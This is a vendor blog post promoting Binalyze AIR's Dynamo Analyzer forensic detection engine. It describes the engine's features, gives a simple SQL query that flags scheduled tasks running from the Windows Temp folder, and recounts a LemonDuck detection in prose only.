Dynamo Analyzer: When YARA isn’t enough!

Last updated: 21st June 2024

In a landscape where rapid and precise threat detection across assets in your IT estates is crucial,  the Binalyze Dynamo Analyzer within AIR’s Automated Compromise Assessment capability (DRONE), bridges the gap between traditional Security Information and Event Management (SIEM) systems and advanced asset analysis technologies. Dynamo Analyzer is Binalyze AIR’s innovative rule engine that is transforming how threats are detected, analyzed, and managed directly from your specified evidence collections.

Introducing Dynamo: Advanced Threat Detection

Dynamo is not just another tool in your Investigation and Response arsenal. In Binalyze AIR it revolutionizes threat detection, analysis, and management directly on evidence collected from your assets, whether on Windows, Linux, or macOS. Dynamo's unique approach involves the active collection, parsing, and sophisticated rule-based analysis of asset data, ensuring rapid and accurate threat detection.

Dynamo's Core Functionalities

• Software Vulnerability Detection: Dynamo can scan for outdated software installations using a comprehensive database of known vulnerabilities. It employs heuristic analysis to detect potential vulnerabilities that may not yet be cataloged.
• DNS Cache and Scheduled Task Analysis: Dynamo analyzes DNS cache records to identify domains linked to known malicious activities. It evaluates scheduled tasks, focusing on anomalies in task configurations and execution paths that are commonly exploited by malware.
• Fileless Malware Detection: Dynamo's advanced algorithms detect fileless malware by parsing collected evidence and matching relevant items with a large, ever-growing set of detection rules.
• Analyzing Parsed Forensic Evidence: Binalyze AIR’s evidence collection capability is widely respected, and the forensic collections from assets are stored in an SQL database. This allows Dynamo to deliver complex SQL script-based queries against the collected data, which can be further enhanced with uGO scripting language for more advanced logic, enabling sophisticated pattern detection analysis.

We could say that the uGO Scripting Language serves as an advanced integration and orchestration framework designed to seamlessly connect and leverage the capabilities of various engines such as YARA, Sigma, osquery, and more. It empowers users with the flexibility to define custom workflows and logic, enabling the correlation of diverse inputs from these engines. This holistic approach significantly enhances the decision-making process, providing more accurate and comprehensive verdicts. uGO's versatile scripting capabilities facilitate efficient threat detection, system analysis, and security automation, making it an invaluable tool in complex IT environments.

• Integration with osquery: Dynamo can leverage osquery for advanced system queries. This integration allows Dynamo to perform an in-depth analysis of system states and configurations, enhancing its detection capabilities.
• Correlation Rule Capabilities: Dynamo's advanced correlation engine can aggregate individual findings to identify complex threat patterns. This enables Dynamo to transform low-level signals into actionable high-fidelity alerts.

Technical Specifications:

• Data Parsing: Dynamo uses advanced parsing algorithms capable of interpreting complex data structures from various sources, including system logs and network traffic.
• Alert Mechanism: Implements a sophisticated alerting mechanism that categorizes threats based on severity, impact, and confidence levels.
• Integration: Offers seamless integration with existing security infrastructure investments, including SIEM systems, threat intelligence platforms, and incident response workflows.
• File Formats: Supports a wide range of file formats for analysis, including but not limited to 'EVT', 'EVTX', SQL, and various other binary and text-based log formats.

Advantages of Dynamo

• On Asset Analysis: By performing analysis on the asset, Dynamo minimizes latency and bandwidth issues associated with data transfer, ensuring timely detection even in bandwidth-constrained environments.
• Privacy & Compliance: Dynamo addresses privacy and compliance concerns by processing data locally on the asset (for example, endpoints and servers), reducing the need to export sensitive data.
• Customization: Dynamo supports Binalyze to customize our own detection rules and analysis parameters to best respond at speed to new security postures and evolving threat landscapes.

Our Dynamo implementation is seamlessly integrated within DRONE, alongside our suite of proprietary analyzers, poised to meticulously analyze any evidence gathered during your evidence acquisition processes. 

The data you collect with AIR is saved to an SQL database (case.db) which is part of the overall .ppc file that is generated for each Tasking Assignment run by the AIR agent on an asset.

Binalyze’s DFIR Lab, our team of in-house researchers and threat hunters, is constantly adding many new SQL queries to the Dynamo Analyzer, which in turn interrogates the evidence collected in the case.db file. 

Dynamo Analyzer Example

A very simple example of one such rule may look something like this where Dynamo will be searching the collected evidence for an attempt at achieving ‘persistence’ on the asset by scheduling the automatic running of an application from the Windows Temp folder:

SELECT * FROM autoruns_scheduled_tasks

WHERE command_line LIKE '%\Windows\Temp\%'

The SQL queries written by our DFIR Lab using Dynamo are typically much more advanced and are crafted to swiftly identify and grade Findings, thereby guiding the user's investigation more efficiently.

Let’s look at an example where our implementation of Dynamo has delivered findings into AIR’s Investigation Hub.

Here we see 4 findings marked as ‘High’, and the Finding column explains that these items are; ‘WMI suspicious commands’.

A closer inspection of the Investigation Hub details window reveals that:

• The PowerShell command was hidden.
• Conversion from Base64 was used.
• The domain URL has been obfuscated by concatenation.

For these reasons, this WMI command is marked as a ‘High’ severity finding by DRONE.

From here, the investigator could inspect the DNS cache in the Investigation Hub, and in our case, we can see a Low Finding which reveals the URL in its unobfuscated state. 

Selecting the embedded VirusTotal Details or VTRelations link immediately identifies that this WMI command and the subsequent DNS cache entry are associated with the well-known malware, LemonDuck. 

In conclusion

Dynamo Analyzer is a comprehensive security solution that fills the gaps left by traditional tools like YARA. By offering advanced functionalities, such as fileless malware detection and DNS cache analysis, Dynamo provides a more robust and nuanced approach to threat detection and system security.

Since its initial addition to DRONE, Dynamo Analyzer has undergone continuous enhancements, further solidifying its role in incident response and cybersecurity. At the heart of DRONE, Dynamo Analyzer is designed to seamlessly identify vulnerable individual assets or across vast networks, making it a crucial automated analysis tool provided by AIR to ensure a secure and resilient cybersecurity infrastructure. Future AIR releases will continue to expand the development of Dynamo rulesets and, eventually, open up Dynamo to users, allowing them to apply their own custom rules to the engine. This ongoing evolution aims to empower users with greater control and flexibility in their security measures.

When combining Dynamo Analyzer with all the other DRONE capabilities, you can finally say goodbye to the tedious search for the proverbial needle in a haystack and reallocate that valuable time to other vital aspects of the investigation process.

To learn more about how the Dynamo Analyzer can supercharge your investigation and threat-hunting efforts, contact us today or try it for yourself.